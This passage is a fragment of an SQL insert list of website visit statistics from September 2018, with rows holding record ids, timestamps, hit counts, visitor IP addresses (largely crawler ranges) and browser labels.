(300136,1536392233,1,1,0,0,'54.36.148.229','other'),(300137,1536392685,1,0,1,0,'66.249.66.26',''),(300138,1536392785,1,1,0,0,'54.36.148.134','other'),(300139,1536392958,1,0,1,0,'66.249.66.74',''),(300140,1536392982,1,1,0,0,'54.36.148.247','other'),(300141,1536393112,1,1,0,0,'54.36.149.55','other'),(300142,1536393247,1,1,0,0,'8.29.198.25','other'),(300143,1536393446,1,1,0,0,'54.36.149.41','other'),(300144,1536393510,1,1,0,0,'54.36.149.107','other'),(300145,1536393657,1,1,0,0,'40.77.167.125','other'),(300146,1536393676,1,1,0,0,'54.36.149.9','other'),(300147,1536393993,1,1,0,0,'54.36.148.33','other'),(300148,1536394183,1,1,0,0,'54.36.149.77','other'),(300149,1536394354,1,1,0,0,'54.36.148.214','other'),(300150,1536394371,1,1,0,0,'54.36.148.211','other'),(300151,1536394457,1,1,0,0,'66.249.66.74','chrome'),(300152,1536394460,1,1,0,0,'54.36.148.124','other'),(300153,1536394739,1,1,0,0,'178.154.244.11','other'),(300154,1536394812,2,2,0,0,'66.249.66.73','chrome'),(300155,1536394860,1,1,0,0,'54.36.148.235','other'),(300156,1536395000,1,1,0,0,'54.36.149.79','other'),(300157,1536395150,1,1,0,0,'54.36.149.12','other'),(300158,1536395359,1,1,0,0,'54.36.149.82','other'),(300159,1536395399,1,1,0,0,'54.36.149.64','other'),(300160,1536395427,1,1,0,0,'216.244.66.241','other'),(300161,1536395623,1,1,0,0,'40.77.167.125','other'),(300162,1536395671,2,2,0,0,'178.154.244.29','other'),(300163,1536395891,1,1,0,0,'66.249.66.25','chrome'),(300164,1536396267,1,1,0,0,'54.36.148.139','other'),(300165,1536396530,1,1,0,0,'54.36.148.72','other'),(300166,1536396709,1,1,0,0,'54.36.149.86','other'),(300167,1536396853,1,1,0,0,'54.36.149.35','other'),(300168,1536396999,1,1,0,0,'54.36.149.44','other'),(300169,1536397232,1,1,0,0,'91.209.11.236','other'),(300170,1536397359,1,0,1,0,'66.249.66.74',''),(300171,1536397593,1,1,0,0,'54.36.148.29','other'),(300172,1536397714,1,0,1,0,'66.249.66.73',''),(300173,1536397746,1,1,0,0,'54.36.148.75','other'),(300175,1536397916,1,0,1,0,'66.249.66.26',''),(300176,1536398302,1,1,0,0,'54.36.148.193','other'),(300177,1536398558,2,2,0,0,'66.249.66.74','chrome'),(300178,1536398673,1,1,0,0,'54.36.148.168','other'),(300179,1536398842,1,1,0,0,'54.36.148.239','other'),(300180,1536399045,1,1,0,0,'54.36.148.218','other'),(300181,1536399159,1,1,0,0,'54.36.148.112','other'),(300182,1536399382,1,1,0,0,'54.36.148.77','other'),(300183,1536399667,1,1,0,0,'207.46.13.208','other'),(300184,1536400022,1,1,0,0,'54.36.148.169','other'),(300185,1536400181,1,1,0,0,'54.36.148.183','other'),(300186,1536400333,1,1,0,0,'54.36.149.77','other'),(300187,1536400435,1,1,0,0,'54.36.149.56','other'),(300188,1536401012,1,1,0,0,'66.249.66.74','chrome'),(300189,1536401109,1,1,0,0,'66.249.66.25','chrome'),(300190,1536401578,1,1,0,0,'54.36.148.75','other'),(300191,1536402093,1,1,0,0,'66.249.66.73','chrome'),(300192,1536402435,1,1,0,0,'54.36.148.115','other'),(300193,1536403038,1,1,0,0,'66.249.66.75','chrome'),(300194,1536403120,1,1,0,0,'54.36.148.21','other'),(300195,1536403147,1,0,1,0,'66.249.66.74',''),(300196,1536403246,1,1,0,0,'54.36.148.231','other'),(300197,1536403467,1,0,1,0,'66.249.66.25',''),(300198,1536403661,1,1,0,0,'54.36.149.65','other'),(300199,1536403712,1,1,0,0,'54.36.148.70','other'),(300200,1536403886,1,1,0,0,'54.36.148.205','other'),(300201,1536404074,1,1,0,0,'8.29.198.26','other'),(300202,1536404086,2,2,0,0,'66.249.66.74','chrome'),(300203,1536404355,1,1,0,0,'54.36.148.186','other'),(300204,1536404521,1,1,0,0,'54.36.149.25','other'),(300205,1536404554,1,1,0,0,'54.36.148.105','other'),(300206,1536404938,1,1,0,0,'54.36.148.213','other'),(300207,1536405376,1,1,0,0,'54.36.148.200','other'),(300208,1536405434,1,1,0,0,'54.36.149.49','other'),(300209,1536405613,1,1,0,0,'54.36.149.41','other'),(300210,1536405644,1,1,0,0,'54.36.149.102','other'),(300211,1536405707,1,1,0,0,'54.36.149.22','other'),(300212,1536406101,1,1,0,0,'54.36.148.209','other'),(300213,1536406402,1,1,0,0,'66.249.66.74','chrome'),(300214,1536406441,1,1,0,0,'54.36.149.23','other'),(300215,1536406474,1,1,0,0,'66.249.66.26','chrome'),(300216,1536406660,1,1,0,0,'54.36.148.33','other'),(300217,1536407045,2,2,0,0,'40.77.167.190','other'),(300218,1536407462,1,1,0,0,'54.36.148.223','other'),(300219,1536407516,1,1,0,0,'54.36.149.85','other'),(300220,1536407533,1,1,0,0,'54.36.148.78','other'),(300221,1536407613,1,1,0,0,'92.113.189.235','chrome'),(300222,1536407623,1,1,0,0,'54.36.148.120','other'),(300223,1536407857,1,1,0,0,'54.36.148.242','other'),(300224,1536408234,1,1,0,0,'54.36.148.228','other'),(300225,1536408309,1,1,0,0,'54.36.148.150','other'),(300226,1536408372,1,1,0,0,'54.36.149.102','other'),(300227,1536408577,1,1,0,0,'54.36.149.67','other'),(300228,1536408659,1,1,0,0,'54.36.148.117','other'),(300229,1536408700,1,0,1,0,'66.249.66.25',''),(300230,1536408754,1,1,0,0,'54.36.148.19','other'),(300231,1536408825,1,1,0,0,'141.8.142.108','other'),(300232,1536409153,1,1,0,0,'54.36.148.213','other'),(300233,1536409230,1,1,0,0,'5.188.210.35','firefox'),(300234,1536409234,1,1,0,0,'54.36.148.178','other'),(300235,1536409274,1,1,0,0,'54.36.148.119','other'),(300236,1536409300,1,1,0,0,'54.36.148.248','other'),(300237,1536409365,1,1,0,0,'66.249.66.75','chrome'),(300238,1536409906,1,1,0,0,'54.36.148.92','other'),(300239,1536410057,1,1,0,0,'54.36.148.31','other'),(300240,1536410243,1,1,0,0,'54.36.148.214','other'),(300241,1536410676,1,1,0,0,'54.36.148.228','other'),(300242,1536410957,2,1,1,0,'66.249.66.75',''),(300243,1536411015,1,1,0,0,'40.77.167.125','other'),(300244,1536411148,1,1,0,0,'178.154.244.11','other'),(300245,1536411230,1,1,0,0,'66.249.66.73','chrome'),(300246,1536411247,2,2,0,0,'54.36.149.12','other'),(300247,1536411663,1,1,0,0,'178.154.244.29','other'),(300248,1536411899,1,1,0,0,'66.249.66.26','chrome'),(300249,1536411975,1,1,0,0,'66.249.66.74','chrome'),(300250,1536412207,1,1,0,0,'40.77.167.214','other'),(300251,1536412507,1,1,0,0,'54.36.148.150','other'),(300252,1536412763,1,1,0,0,'54.36.149.12','other'),(300253,1536412862,1,1,0,0,'54.36.148.186','other'),(300254,1536412901,1,1,0,0,'54.36.148.87','other'),(300255,1536413023,1,1,0,0,'52.53.201.78','chrome'),(300256,1536413201,1,1,0,0,'66.249.66.74','chrome'),(300257,1536413445,1,1,0,0,'54.36.148.30','other'),(300258,1536414108,1,0,1,0,'66.249.66.27',''),(300259,1536414129,1,1,0,0,'216.244.66.241','other'),(300260,1536414242,1,1,0,0,'54.36.149.52','other'),(300261,1536414271,1,1,0,0,'54.36.148.214','other'),(300262,1536414631,1,1,0,0,'54.36.149.8','other'),(300263,1536414896,1,1,0,0,'8.29.198.26','other'),(300264,1536415406,2,2,0,0,'178.154.244.11','other'),(300265,1536415412,1,1,0,0,'54.36.148.167','other'),(300266,1536415451,1,1,0,0,'54.36.149.67','other'),(300267,1536415471,1,1,0,0,'54.36.148.150','other'),(300268,1536415529,1,1,0,0,'54.36.148.85','other'),(300269,1536415534,1,1,0,0,'95.163.255.113','other'),(300270,1536415650,1,0,1,0,'66.249.66.25',''),(300271,1536415826,1,1,0,0,'54.36.148.217','other'),(300272,1536416403,1,0,1,0,'66.249.66.27',''),(300273,1536416528,2,2,0,0,'66.249.66.75','chrome'),(300274,1536416590,1,1,0,0,'66.249.66.74','chrome'),(300275,1536416941,1,1,0,0,'40.77.167.214','other'),(300276,1536417056,1,1,0,0,'66.249.66.73','chrome'),(300277,1536417154,20,20,0,0,'94.154.239.69','other'),(300278,1536417198,1,1,0,0,'40.77.167.190','other'),(300279,1536417320,1,1,0,0,'66.249.66.27','chrome'),(300280,1536417359,1,1,0,0,'54.36.148.218','other'),(300281,1536417551,4,4,0,0,'62.210.157.95','other'),(300282,1536417618,1,1,0,0,'54.36.148.131','other'),(300283,1536417639,1,1,0,0,'54.36.148.237','other'),(300284,1536417844,1,1,0,0,'54.36.148.181','other'),(300285,1536417868,1,0,1,0,'66.249.66.74',''),(300286,1536418150,1,1,0,0,'95.163.255.108','other'),(300287,1536418160,1,1,0,0,'95.163.255.103','other'),(300288,1536418169,1,1,0,0,'95.163.255.115','other'),(300289,1536418407,1,1,0,0,'40.77.167.214','other'),(300290,1536418844,1,1,0,0,'54.36.149.41','other'),(300291,1536418914,1,1,0,0,'66.249.66.75','chrome'),(300292,1536418925,1,1,0,0,'95.133.238.26','chrome'),(300293,1536418951,1,1,0,0,'54.36.148.236','other'),(300294,1536418959,1,1,0,0,'54.36.149.81','other'),(300295,1536419067,1,1,0,0,'54.36.149.44','other'),(300296,1536419212,1,1,0,0,'54.36.149.54','other'),(300297,1536419842,1,1,0,0,'92.113.189.235','chrome'),(300298,1536419904,1,1,0,0,'54.36.148.197','other'),(300299,1536419962,2,2,0,0,'40.77.167.214','other'),(300300,1536420201,1,1,0,0,'54.36.148.51','other'),(300301,1536420301,1,1,0,0,'178.154.244.29','other'),(300302,1536420414,1,1,0,0,'54.36.148.138','other'),(300303,1536420462,1,1,0,0,'54.36.149.21','other'),(300304,1536420685,1,1,0,0,'54.165.59.7','other'),(300305,1536420759,1,1,0,0,'54.36.148.205','other'),(300306,1536420918,1,0,1,0,'66.249.66.25',''),(300307,1536420962,1,1,0,0,'54.36.148.104','other'),(300308,1536421131,1,1,0,0,'54.36.148.16','other'),(300309,1536421555,1,1,0,0,'54.36.148.253','other'),(300310,1536421655,1,1,0,0,'54.36.149.2','other'),(300311,1536421749,1,1,0,0,'54.36.148.96','other'),(300312,1536422197,1,1,0,0,'54.36.148.246','other'),(300313,1536422270,1,1,0,0,'54.36.148.181','other'),(300314,1536422548,1,1,0,0,'54.36.148.45','other'),(300315,1536423060,1,1,0,0,'54.36.149.53','other'),(300316,1536423429,1,1,0,0,'54.36.149.25','other'),(300317,1536423897,1,1,0,0,'95.163.255.94','other'),(300318,1536424037,1,1,0,0,'54.36.148.32','other'),(300319,1536425156,1,1,0,0,'54.36.148.116','other'),(300320,1536425161,1,1,0,0,'54.36.149.48','other'),(300321,1536425173,1,1,0,0,'54.36.149.47','other'),(300322,1536425232,1,1,0,0,'54.36.149.7','other'),(300323,1536425717,1,1,0,0,'8.29.198.26','other'),(300324,1536425918,1,1,0,0,'54.36.149.58','other'),(300325,1536426289,1,1,0,0,'54.36.148.98','other'),(300326,1536426592,1,1,0,0,'54.36.148.82','other'),(300327,1536427053,1,1,0,0,'54.36.148.90','other'),(300328,1536427101,1,1,0,0,'54.36.148.68','other'),(300329,1536427212,1,1,0,0,'54.36.148.85','other'),(300330,1536427230,5,4,1,0,'66.249.66.27',''),(300331,1536427232,3,3,0,0,'66.249.66.26','chrome'),(300332,1536427252,2,0,2,0,'66.249.66.75',''),(300333,1536427311,9,3,6,0,'66.249.66.73',''),(300334,1536427490,1,1,0,0,'193.105.62.8','chrome'),(300335,1536427497,1,1,0,0,'40.77.167.214','other'),(300336,1536427505,6,2,4,0,'66.249.66.74',''),(300337,1536427508,1,1,0,0,'66.249.66.25','chrome'),(300338,1536427518,1,1,0,0,'54.36.149.28','other'),(300339,1536427698,1,1,0,0,'141.8.132.16','other'),(300340,1536427794,1,1,0,0,'54.36.149.33','other'),(300341,1536427864,1,1,0,0,'66.249.66.76','chrome'),(300342,1536427875,1,1,0,0,'54.36.148.237','other'),(300343,1536427997,1,1,0,0,'66.249.66.75','chrome'),(300344,1536428100,1,1,0,0,'54.36.148.45','other'),(300345,1536428286,1,1,0,0,'54.36.148.123','other'),(300346,1536428466,1,1,0,0,'54.36.148.227','other'),(300347,1536429047,1,1,0,0,'54.36.149.5','other'),(300348,1536429502,1,1,0,0,'207.46.13.208','other'),(300349,1536429506,1,1,0,0,'54.36.148.146','other'),(300350,1536429555,1,1,0,0,'54.36.148.74','other'),(300351,1536429805,3,0,3,0,'66.249.66.75',''),(300352,1536429816,4,0,4,0,'66.249.66.74',''),(300353,1536429819,6,0,6,0,'66.249.66.73',''),(300354,1536429893,1,1,0,0,'54.36.148.215','other'),(300355,1536430001,1,0,1,0,'66.249.66.27',''),(300356,1536430093,2,2,0,0,'54.36.148.157','other'),(300357,1536430169,1,1,0,0,'54.36.149.70','other'),(300358,1536430348,1,1,0,0,'54.36.149.18','other'),(300359,1536430522,1,1,0,0,'54.36.148.149','other'),(300360,1536430722,1,1,0,0,'54.36.148.145','other'),(300361,1536431008,1,1,0,0,'51.255.65.46','other'),(300362,1536431165,1,1,0,0,'54.36.149.77','other'),(300363,1536431415,1,1,0,0,'54.36.149.93','other'),(300364,1536431437,1,1,0,0,'54.36.149.75','other'),(300365,1536431489,1,1,0,0,'54.36.148.134','other'),(300366,1536431953,1,1,0,0,'66.249.66.73','chrome'),(300367,1536432018,1,1,0,0,'40.77.167.190','other'),(300368,1536432310,1,1,0,0,'54.36.148.193','other'),(300369,1536432510,1,1,0,0,'178.154.244.29','other'),(300370,1536432649,1,1,0,0,'54.165.59.7','other'),(300371,1536432929,1,1,0,0,'54.36.148.212','other'),(300372,1536433030,1,1,0,0,'54.36.148.108','other'),(300373,1536433251,1,1,0,0,'54.36.148.244','other'),(300374,1536433819,1,1,0,0,'178.154.244.29','other'),(300375,1536434041,1,1,0,0,'54.36.148.70','other'),(300376,1536434242,1,1,0,0,'54.36.148.227','other'),(300377,1536434530,1,1,0,0,'54.36.149.40','other'),(300378,1536434705,1,1,0,0,'91.196.178.81','chrome'),(300379,1536434831,1,1,0,0,'54.36.148.183','other'),(300380,1536434891,1,1,0,0,'54.36.148.40','other'),(300381,1536435066,1,1,0,0,'54.36.148.220','other'),(300382,1536435158,1,1,0,0,'54.36.149.95','other'),(300383,1536435196,1,1,0,0,'54.36.148.16','other'),(300384,1536435523,1,1,0,0,'54.36.148.10','other'),(300385,1536435735,1,1,0,0,'54.36.148.13','other'),(300386,1536435766,1,1,0,0,'54.36.148.65','other'),(300387,1536435937,1,1,0,0,'54.36.148.85','other'),(300388,1536436077,1,1,0,0,'207.46.13.208','other'),(300389,1536436095,1,1,0,0,'54.36.149.87','other'),(300390,1536436212,1,1,0,0,'54.36.148.209','other'),(300391,1536436247,1,1,0,0,'54.36.148.128','other'),(300392,1536436260,2,2,0,0,'66.249.66.75','chrome'),(300393,1536436500,1,1,0,0,'54.36.148.243','other'),(300394,1536436545,1,1,0,0,'8.29.198.27','other'),(300395,1536436723,1,1,0,0,'54.36.148.188','other'),(300396,1536437306,1,1,0,0,'54.36.149.38','other'),(300397,1536437348,1,1,0,0,'54.36.149.27','other'),(300398,1536437349,1,1,0,0,'66.249.66.26','chrome'),(300399,1536437377,1,0,1,0,'66.249.66.74',''),(300400,1536437430,1,1,0,0,'54.36.148.195','other'),(300401,1536437434,2,2,0,0,'66.249.66.74','chrome'),(300402,1536437479,1,1,0,0,'54.36.149.88','other'),(300403,1536437518,1,1,0,0,'178.154.244.29','other'),(300404,1536437656,1,1,0,0,'54.36.148.69','other'),(300405,1536437788,1,1,0,0,'54.36.148.14','other'),(300406,1536438183,1,1,0,0,'54.36.149.71','other'),(300407,1536438638,1,1,0,0,'54.36.149.5','other'),(300408,1536439269,1,1,0,0,'54.36.149.82','other'),(300409,1536439479,1,1,0,0,'207.46.13.208','other'),(300410,1536439540,1,1,0,0,'54.36.149.26','other'),(300411,1536439635,1,1,0,0,'54.36.148.170','other'),(300412,1536439988,1,1,0,0,'54.36.148.250','other'),(300413,1536440070,1,1,0,0,'54.36.148.188','other'),(300414,1536440167,1,1,0,0,'66.249.66.74','chrome'),(300415,1536440284,1,1,0,0,'54.36.148.145','other'),(300416,1536440307,1,1,0,0,'54.36.148.241','other'),(300417,1536440332,1,1,0,0,'54.36.149.40','other'),(300418,1536440460,1,1,0,0,'40.77.167.214','other'),(300419,1536440499,2,2,0,0,'54.36.148.208','other'),(300420,1536440575,1,1,0,0,'144.76.29.148','other'),(300421,1536440719,1,0,1,0,'66.249.66.26',''),(300422,1536441023,1,1,0,0,'178.154.244.29','other'),(300423,1536441164,1,1,0,0,'54.36.148.62','other'),(300424,1536441436,1,1,0,0,'54.36.148.22','other'),(300425,1536441465,1,1,0,0,'54.36.148.77','other'),(300426,1536441709,1,1,0,0,'54.36.149.31','other'),(300427,1536441922,1,1,0,0,'54.36.149.6','other'),(300428,1536441950,1,0,1,0,'66.249.66.75',''),(300429,1536442194,1,1,0,0,'54.36.148.128','other'),(300430,1536442373,1,1,0,0,'54.36.149.58','other'),(300431,1536442516,1,1,0,0,'216.244.66.241','other'),(300432,1536442561,1,1,0,0,'66.249.66.26','chrome'),(300433,1536442774,1,1,0,0,'66.249.66.75','chrome'),(300434,1536442820,1,1,0,0,'66.249.66.73','chrome'),(300435,1536443079,1,1,0,0,'54.36.148.180','other'),(300436,1536443372,1,1,0,0,'54.36.148.174','other'),(300437,1536443679,1,1,0,0,'54.36.148.134','other'),(300438,1536443840,1,1,0,0,'54.36.148.26','other'),(300439,1536443936,1,1,0,0,'195.154.146.17','other'),(300440,1536443993,1,1,0,0,'54.36.148.243','other'),(300441,1536444179,1,1,0,0,'54.36.148.178','other'),(300442,1536444412,1,1,0,0,'54.36.149.66','other'),(300443,1536444519,1,1,0,0,'54.36.148.132','other'),(300444,1536444534,1,1,0,0,'54.36.148.71','other'),(300445,1536444637,1,1,0,0,'54.36.148.23','other'),(300446,1536444851,1,1,0,0,'54.36.148.245','other'),(300447,1536444946,1,1,0,0,'180.76.15.135','other'),(300448,1536445095,1,1,0,0,'54.36.148.130','other'),(300449,1536445120,1,1,0,0,'5.166.155.119','chrome'),(300450,1536445139,1,1,0,0,'54.36.149.39','other'),(300451,1536445286,1,1,0,0,'54.36.149.53','other'),(300452,1536445325,1,1,0,0,'54.36.148.19','other'),(300453,1536445553,1,1,0,0,'54.36.148.141','other'),(300454,1536445613,1,1,0,0,'66.249.66.27','chrome'),(300455,1536445791,1,1,0,0,'216.244.66.241','other'),(300456,1536445917,1,1,0,0,'54.36.148.228','other'),(300457,1536445964,1,1,0,0,'54.36.149.41','other'),(300458,1536446022,2,1,1,0,'66.249.66.75',''),(300459,1536446084,1,1,0,0,'54.36.149.31','other'),(300460,1536446203,1,1,0,0,'40.77.167.190','other'),(300461,1536446233,1,1,0,0,'54.36.148.25','other'),(300462,1536446331,1,1,0,0,'54.36.148.73','other'),(300463,1536446548,1,0,1,0,'66.249.66.25',''),(300464,1536446899,1,1,0,0,'54.36.148.223','other'),(300465,1536447369,1,1,0,0,'8.29.198.25','other'),(300466,1536447554,2,2,0,0,'66.249.66.74','chrome'),(300467,1536447609,2,2,0,0,'178.154.244.29','other'),(300468,1536447932,1,1,0,0,'178.154.244.11','other'),(300469,1536448194,1,1,0,0,'66.249.66.26','chrome'),(300470,1536448207,1,1,0,0,'54.36.148.18','other'),(300471,1536448416,1,1,0,0,'54.36.148.100','other'),(300472,1536448535,1,1,0,0,'54.36.149.103','other'),(300473,1536448543,1,1,0,0,'54.36.148.185','other'),(300474,1536448918,1,0,1,0,'66.249.66.27',''),(300475,1536449323,1,1,0,0,'178.154.244.29','other'),(300476,1536449369,1,1,0,0,'54.36.148.216','other'),(300477,1536449491,1,1,0,0,'54.36.148.54','other'),(300478,1536449556,1,1,0,0,'54.36.148.61','other'),(300479,1536449621,1,1,0,0,'54.36.149.27','other'),(300480,1536449710,1,1,0,0,'66.102.9.27','chrome'),(300481,1536450087,1,1,0,0,'54.36.149.32','other'),(300482,1536450299,1,1,0,0,'54.36.148.14','other'),(300483,1536450321,1,1,0,0,'54.36.148.204','other'),(300484,1536450476,1,1,0,0,'54.36.148.171','other'),(300485,1536450892,3,3,0,0,'66.249.66.74','chrome'),(300486,1536451156,1,0,1,0,'66.249.66.73',''),(300487,1536451379,1,1,0,0,'54.36.148.115','other'),(300488,1536451402,1,1,0,0,'54.36.148.47','other'),(300489,1536451699,1,0,1,0,'66.249.66.25',''),(300490,1536452060,1,1,0,0,'54.36.148.24','other'),(300491,1536452277,2,2,0,0,'40.77.167.190','other'),(300492,1536452671,1,1,0,0,'54.36.148.187','other'),(300493,1536452789,1,1,0,0,'66.249.66.74','chrome'),(300494,1536452876,1,1,0,0,'54.36.148.71','other'),(300495,1536452988,1,1,0,0,'54.36.149.49','other'),(300496,1536453057,1,1,0,0,'54.36.148.50','other'),(300497,1536453114,1,1,0,0,'54.36.148.174','other'),(300498,1536453315,1,1,0,0,'66.249.66.25','chrome'),(300499,1536453928,1,1,0,0,'54.36.148.63','other'),(300500,1536454298,1,1,0,0,'54.36.149.22','other'),(300501,1536454338,1,1,0,0,'54.36.148.141','other'),(300502,1536454432,1,1,0,0,'66.249.66.74','chrome'),(300503,1536454608,1,1,0,0,'54.36.149.7','other'),(300504,1536454692,1,1,0,0,'54.36.148.231','other'),(300505,1536455839,3,1,2,0,'66.249.66.74',''),(300506,1536456004,1,1,0,0,'66.249.66.27','chrome'),(300507,1536456126,1,1,0,0,'54.36.148.75','other'),(300508,1536456142,1,1,0,0,'54.36.149.6','other'),(300509,1536456231,1,1,0,0,'54.36.149.79','other'),(300510,1536456260,1,1,0,0,'66.249.66.73','chrome'),(300511,1536456399,1,1,0,0,'40.77.167.190','other'),(300512,1536456878,1,1,0,0,'54.36.148.37','other'),(300513,1536457058,1,1,0,0,'54.36.148.140','other'),(300514,1536457179,1,0,1,0,'66.249.66.26',''),(300515,1536457195,1,1,0,0,'54.36.149.2','other'),(300516,1536457510,1,1,0,0,'178.63.82.50','other'),(300517,1536457512,1,1,0,0,'54.36.148.254','other'),(300518,1536457747,1,1,0,0,'66.249.66.74','chrome'),(300519,1536457751,1,1,0,0,'176.193.121.7','msie'),(300520,1536457863,1,1,0,0,'54.36.149.29','other'),(300521,1536458152,1,1,0,0,'54.36.148.116','other'),(300522,1536458194,1,1,0,0,'8.29.198.27','other'),(300523,1536458203,1,0,1,0,'66.249.66.25',''),(300524,1536458247,1,1,0,0,'54.36.148.211','other'),(300525,1536458376,1,1,0,0,'66.249.66.26','chrome'),(300526,1536458690,1,1,0,0,'54.36.148.167','other'),(300527,1536458742,1,1,0,0,'54.36.148.110','other'),(300528,1536459252,1,1,0,0,'52.41.211.72','chrome'),(300529,1536459306,8,8,0,0,'5.9.141.8','other'),(300530,1536459765,1,1,0,0,'54.36.148.66','other'),(300531,1536460099,1,1,0,0,'66.249.66.27','chrome'),(300532,1536460334,1,1,0,0,'54.36.149.69','other'),(300533,1536460649,1,1,0,0,'66.249.66.75','chrome'),(300534,1536460943,1,1,0,0,'66.249.66.74','chrome'),(300535,1536461042,1,1,0,0,'54.36.148.165','other'),(300536,1536461772,1,1,0,0,'54.36.149.86','other'),(300537,1536462126,1,1,0,0,'66.249.66.74','chrome'),(300538,1536462278,1,1,0,0,'54.36.149.105','other'),(300539,1536462286,1,1,0,0,'54.36.148.64','other'),(300540,1536462291,1,1,0,0,'54.36.148.112','other'),(300541,1536462561,2,1,1,0,'66.249.66.25',''),(300542,1536462612,1,1,0,0,'66.249.66.73','chrome'),(300543,1536462746,1,1,0,0,'54.36.149.26','other'),(300544,1536464009,1,1,0,0,'54.36.148.157','other'),(300545,1536464032,3,3,0,0,'5.9.140.242','other'),(300546,1536464512,1,1,0,0,'54.36.148.201','other'),(300547,1536464540,1,1,0,0,'54.36.148.35','other'),(300548,1536464792,2,1,1,0,'66.249.66.73',''),(300549,1536464983,1,1,0,0,'40.77.167.190','other'),(300550,1536465623,1,1,0,0,'66.249.66.74','chrome'),(300551,1536465641,1,1,0,0,'54.36.148.74','other'),(300552,1536465718,1,1,0,0,'193.106.30.98','firefox'),(300553,1536465855,1,1,0,0,'54.36.149.33','other'),(300554,1536466303,2,2,0,0,'95.213.141.126','opera'),(300555,1536466677,1,1,0,0,'54.36.148.96','other'),(300556,1536466747,1,1,0,0,'66.249.66.25','chrome'),(300557,1536467273,1,1,0,0,'54.36.149.49','other'),(300558,1536467478,1,1,0,0,'66.249.66.26','chrome'),(300559,1536467569,1,1,0,0,'54.36.148.103','other'),(300560,1536467702,1,1,0,0,'66.249.66.74','chrome'),(300561,1536467833,1,0,1,0,'66.249.66.27',''),(300562,1536467921,1,1,0,0,'95.163.255.93','other'),(300563,1536468456,1,1,0,0,'54.36.148.232','other'),(300564,1536468461,2,1,1,0,'66.249.66.73',''),(300565,1536468716,1,1,0,0,'95.163.255.102','other'),(300566,1536468721,1,1,0,0,'95.163.255.113','other'),(300567,1536468726,1,1,0,0,'95.163.255.108','other'),(300568,1536468732,1,1,0,0,'95.163.255.109','other'),(300569,1536468755,1,1,0,0,'66.249.66.26','chrome'),(300570,1536469002,1,1,0,0,'54.36.149.77','other'),(300571,1536469016,1,1,0,0,'8.29.198.25','other'),(300572,1536469047,1,1,0,0,'54.36.149.50','other'),(300573,1536469331,1,1,0,0,'66.249.66.74','chrome'),(300574,1536469374,1,1,0,0,'54.36.148.150','other'),(300575,1536469459,1,1,0,0,'54.36.149.90','other'),(300576,1536469551,1,1,0,0,'54.36.148.210','other'),(300577,1536469591,1,1,0,0,'91.196.178.51','chrome'),(300578,1536469853,1,1,0,0,'54.36.149.57','other'),(300579,1536470172,1,1,0,0,'54.36.148.32','other'),(300580,1536470460,1,1,0,0,'54.36.148.79','other'),(300581,1536470519,1,1,0,0,'54.36.149.78','other'),(300582,1536470677,1,1,0,0,'54.36.149.98','other'),(300583,1536470685,1,1,0,0,'66.249.66.74','chrome'),(300584,1536471250,1,1,0,0,'54.36.148.253','other'),(300585,1536471425,1,1,0,0,'66.249.66.25','chrome'),(300586,1536471581,1,1,0,0,'31.13.115.5','other'),(300587,1536471913,1,1,0,0,'178.154.244.29','other'),(300588,1536472127,1,1,0,0,'66.249.66.75','chrome'),(300589,1536472145,1,1,0,0,'54.36.149.88','other'),(300590,1536472326,1,1,0,0,'54.36.149.51','other'),(300591,1536472336,1,1,0,0,'54.36.148.250','other'),(300592,1536472895,1,0,1,0,'66.249.66.73',''),(300593,1536472919,1,1,0,0,'66.249.66.74','chrome'),(300594,1536472926,1,1,0,0,'54.36.148.28','other'),(300595,1536473181,1,1,0,0,'54.36.148.169','other'),(300596,1536473205,1,1,0,0,'178.154.244.29','other'),(300597,1536473234,1,0,1,0,'66.249.66.27',''),(300598,1536473298,1,1,0,0,'54.36.148.207','other'),(300599,1536473491,1,1,0,0,'54.36.148.229','other'),(300600,1536473506,1,1,0,0,'54.36.148.201','other'),(300601,1536473532,1,1,0,0,'66.102.9.25','chrome'),(300602,1536473719,1,1,0,0,'54.36.149.89','other'),(300603,1536473752,1,1,0,0,'54.36.149.73','other'),(300604,1536474057,1,1,0,0,'54.36.149.7','other'),(300605,1536474116,2,2,0,0,'178.154.244.29','other'),(300606,1536474267,1,1,0,0,'54.36.148.148','other'),(300607,1536474567,1,1,0,0,'54.36.148.10','other'),(300608,1536475287,1,1,0,0,'54.36.148.223','other'),(300609,1536475309,1,1,0,0,'54.36.148.110','other'),(300610,1536475566,1,1,0,0,'54.36.149.20','other'),(300611,1536475684,1,1,0,0,'54.36.149.10','other'),(300612,1536475910,1,1,0,0,'54.36.148.144','other'),(300613,1536476064,1,1,0,0,'40.77.167.65','other'),(300614,1536476111,1,1,0,0,'54.36.148.49','other'),(300615,1536476170,1,1,0,0,'54.36.148.128','other'),(300616,1536476579,1,1,0,0,'54.36.149.60','other'),(300617,1536476815,1,1,0,0,'148.66.145.148','firefox'),(300618,1536476902,1,0,1,0,'66.249.66.75',''),(300619,1536477681,1,1,0,0,'66.249.66.75','chrome'),(300620,1536477724,1,1,0,0,'66.249.66.26','chrome'),(300621,1536477997,1,1,0,0,'91.196.178.89','chrome'),(300622,1536478358,1,0,1,0,'66.249.66.73',''),(300623,1536478403,1,1,0,0,'40.77.167.190','other'),(300624,1536478702,2,2,0,0,'66.249.66.73','chrome'),(300625,1536479074,1,0,1,0,'66.249.66.27',''),(300626,1536479387,1,1,0,0,'178.154.244.29','other'),(300627,1536479391,2,2,0,0,'5.45.207.19','other'),(300628,1536479625,1,0,1,0,'66.249.66.26',''),(300629,1536479782,1,1,0,0,'92.113.189.235','chrome'),(300630,1536479840,1,1,0,0,'8.29.198.26','other'),(300631,1536479882,1,1,0,0,'40.77.167.125','other'),(300632,1536480189,1,1,0,0,'54.36.149.13','other'),(300633,1536480194,1,1,0,0,'54.36.149.32','other'),(300634,1536480275,1,1,0,0,'54.36.149.40','other'),(300635,1536480278,1,1,0,0,'185.16.125.50','chrome'),(300636,1536480395,1,1,0,0,'54.36.148.232','other'),(300637,1536480806,1,1,0,0,'54.36.148.230','other'),(300638,1536481041,1,1,0,0,'62.210.142.48','firefox'),(300639,1536481473,1,1,0,0,'54.36.149.14','other'),(300640,1536481827,1,1,0,0,'92.113.189.235','chrome'),(300641,1536481837,1,1,0,0,'178.154.244.29','other'),(300642,1536482103,1,1,0,0,'54.36.148.141','other'),(300643,1536482110,1,1,0,0,'95.163.255.92','other'),(300644,1536482730,1,1,0,0,'54.36.148.94','other'),(300645,1536482741,2,2,0,0,'66.249.66.74','chrome'),(300646,1536482757,1,1,0,0,'54.36.149.12','other'),(300647,1536482948,1,1,0,0,'54.36.148.166','other'),(300648,1536482953,1,1,0,0,'66.249.66.73','chrome'),(300649,1536482985,1,1,0,0,'54.36.148.29','o